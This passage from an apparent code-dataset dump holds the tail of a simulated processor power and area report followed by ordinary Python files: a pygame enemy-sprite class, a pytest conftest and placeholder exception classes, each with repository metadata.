'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0560306,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0565138,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.185821,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0189973,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.43818,
'Memory Management Unit/Runtime Dynamic': 0.075511,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.8206,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.257538,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0102427,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0754401,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.34322,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.82714,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0820548,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.267138,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.52011,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.157871,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.25464,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.128534,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.541044,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.100818,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.89238,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0982599,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00662181,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0754737,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0489723,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.173734,
'Execution Unit/Register Files/Runtime Dynamic': 0.0555941,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.17952,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.468423,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.73758,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 1.78875e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 1.78875e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.56194e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.06807e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000703491,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000754886,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000170095,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0470783,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.99459,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.115865,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.159899,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.35843,
'Instruction Fetch Unit/Runtime Dynamic': 0.323768,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0326988,
'L2/Runtime Dynamic': 0.00866286,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.21697,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.961146,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.064053,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0640529,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.51945,
'Load Store Unit/Runtime Dynamic': 1.34109,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.157944,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.315887,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0560547,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.056531,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.186192,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0190379,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.438593,
'Memory Management Unit/Runtime Dynamic': 0.075569,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.831,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.258477,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0102683,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.075574,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.344319,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.83098,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.584845843509205,
'Runtime Dynamic': 6.584845843509205,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.264685,
'Runtime Dynamic': 0.102516,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 82.1344,
'Peak Power': 115.247,
'Runtime Dynamic': 20.3579,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 81.8697,
'Total Cores/Runtime Dynamic': 20.2554,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.264685,
'Total L3s/Runtime Dynamic': 0.102516,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.062363 | 124 | 0.68184 | 8,098 | 68,607 | 5.770684 | 0.067795 | 0.123601 | 0.112987 | 0.093471 | 0.939184 | 0.931865 | 0.91847 | 0.886735 | 0.863495 | 0.844258 | 0 | 0.131314 | 0.224336 | 68,607 | 914 | 125 | 75.062363 | 0.746824 | 0 | 0 | 0.642232 | 0 | 0 | 0.657431 | 0.048099 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f11f21144618727f91bf86ddc21e5350a3a8f977 | 7,443 | py | Python | src/enemy.py | camelNotationsdjkh/Pento-s-Pledge | 575bb4eb42a5e6ee5dc89de8c995e4952076f2f5 | [
"CC0-1.0"
] | null | null | null | src/enemy.py | camelNotationsdjkh/Pento-s-Pledge | 575bb4eb42a5e6ee5dc89de8c995e4952076f2f5 | [
"CC0-1.0"
] | null | null | null | src/enemy.py | camelNotationsdjkh/Pento-s-Pledge | 575bb4eb42a5e6ee5dc89de8c995e4952076f2f5 | [
"CC0-1.0"
] | null | null | null | #! python3
# enemy.py
""" The class for the enemies of the game """
import pygame, constants, random
from spritesheet_functions import SpriteSheet
class Mob(pygame.sprite.Sprite):
def __init__(self, x, y, level, mob_sheet, bounds_left, bounds_right, type="skeleton"):
""" Generic class for mobs """
super().__init__()
""" Using the animation code from the Player and MovingPlatform classes """
self.walking_frames_l = []
self.walking_frames_r = []
self.direction = "R" # direction to start off in
self.boundary_left = bounds_left
self.boundary_right = bounds_right
self.change_x = random.randint(2, 5) # Random Speed
sprite_sheet = SpriteSheet(mob_sheet, True)
# Load images based on type of the monster
if type == "skeleton":
""" Skeleton images, 9 frames """
image = sprite_sheet.get_image(16, 0, 37, 46)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(81, 0, 34, 46)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(146, 0, 34, 46)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(211, 0, 34, 46)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(274, 0, 34, 46)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(335, 0, 34, 46)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(401, 0, 34, 46)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(465, 0, 34, 46)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(528, 0, 34, 46)
self.walking_frames_r.append(image)
# Make the images bigger
for index, image in enumerate(self.walking_frames_r):
self.walking_frames_r[index] = pygame.transform.scale(image, (45, 60))
# Load all the right facing images, then flip them
# to face left.
image = pygame.transform.flip(self.walking_frames_r[0], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[1], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[2], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[3], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[4], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[5], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[6], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[7], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[8], True, False)
self.walking_frames_l.append(image)
elif type == "wolf":
""" Wolf images, 5 frames """
image = sprite_sheet.get_image(0, 0, 62, 32)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(64, 0, 62, 32)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(128, 0, 62, 32)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(192, 0, 62, 32)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(256, 0, 62, 32)
self.walking_frames_r.append(image)
# Make the images bigger
for index, image in enumerate(self.walking_frames_r):
self.walking_frames_r[index] = pygame.transform.scale(image, (80, 40))
# Load all the right facing images, then flip them
# to face left.
image = pygame.transform.flip(self.walking_frames_r[0], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[1], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[2], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[3], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[4], True, False)
self.walking_frames_l.append(image)
else:
""" Goblin images, 6 frames """
image = sprite_sheet.get_image(0, 0, 40, 53)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(63, 0, 40, 53)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(128, 0, 40, 53)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(192, 0, 40, 53)
self.walking_frames_r.append(image)
image = sprite_sheet.get_image(253, 0, 40, 53)
self.walking_frames_r.append(image)
# Make the images bigger
for index, image in enumerate(self.walking_frames_r):
self.walking_frames_r[index] = pygame.transform.scale(image, (50, 60))
# Load all the right facing images, then flip them
# to face left.
image = pygame.transform.flip(self.walking_frames_r[0], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[1], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[2], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[3], True, False)
self.walking_frames_l.append(image)
image = pygame.transform.flip(self.walking_frames_r[4], True, False)
self.walking_frames_l.append(image)
self.image = pygame.image.load("images/coin_sheet.png") # Starting image
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
self.level = level
def update(self):
""" Updates enemies to move left or right """
self.rect.x += self.change_x
pos = self.rect.x - self.level.world_shift
if pos < self.boundary_left or pos > self.boundary_right:
self.change_x *= -1
# Changes direction based on change_x value
if self.change_x < 0: self.direction = "L"
else: self.direction = "R"
# Animates the mob
if self.direction == "R":
frame = (pos // 20) % len(self.walking_frames_r)
self.image = self.walking_frames_r[frame]
else:
frame = (pos // 20) % len(self.walking_frames_l)
self.image = self.walking_frames_l[frame]
| 47.407643 | 92 | 0.602311 | 962 | 7,443 | 4.448025 | 0.138254 | 0.177378 | 0.274129 | 0.19771 | 0.770741 | 0.748773 | 0.741762 | 0.72774 | 0.70437 | 0.700865 | 0 | 0.035721 | 0.296655 | 7,443 | 156 | 93 | 47.711538 | 0.781662 | 0.071477 | 0 | 0.504348 | 0 | 0 | 0.00687 | 0.003206 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017391 | false | 0 | 0.017391 | 0 | 0.043478 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d1877495e12602424aa2ccc0abda37b92ab3629 | 65 | py | Python | conftest.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 1 | 2022-03-03T09:55:57.000Z | 2022-03-03T09:55:57.000Z | conftest.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 7 | 2022-02-09T10:44:53.000Z | 2022-03-28T03:29:43.000Z | conftest.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | null | null | null | from api.tests.fixtures import *
from db.tests.fixtures import *
| 21.666667 | 32 | 0.784615 | 10 | 65 | 5.1 | 0.6 | 0.509804 | 0.745098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123077 | 65 | 2 | 33 | 32.5 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
74112819e6d57bf5112e0666d987129e9462f221 | 670 | py | Python | smartcloudadmin/exceptions.py | ironwill1023/BSS-admin | c4ba6ee07c3a73a6d7070797f0bf3732f8becce5 | [
"MIT"
] | 1 | 2020-02-01T20:36:40.000Z | 2020-02-01T20:36:40.000Z | smartcloudadmin/exceptions.py | ironwill1023/BSS-admin | c4ba6ee07c3a73a6d7070797f0bf3732f8becce5 | [
"MIT"
] | 3 | 2019-03-22T16:09:09.000Z | 2019-04-23T13:02:16.000Z | smartcloudadmin/exceptions.py | cathaldi/smartcloud-administrator | 1c724bb767522d3970d16d88f4cfb39de0bb22af | [
"MIT"
] | null | null | null |
class BssServerError(Exception):
"""todo: this
e.g. Suspending an org that is already suspended.
Activating an org that is already actives
maybe trying to add sub when its deleted etc.
"""
pass
class BssResourceNotFound(Exception):
"""todo: this
e.g. Suspending an org that is already suspended.
Activating an org that is already actives
maybe trying to add sub when its deleted etc.
"""
pass
class BSSBadData(Exception): # 5XX
"""todo: this
e.g. Suspending an org that is already suspended.
Activating an org that is already actives
maybe trying to add sub when its deleted etc.
"""
pass
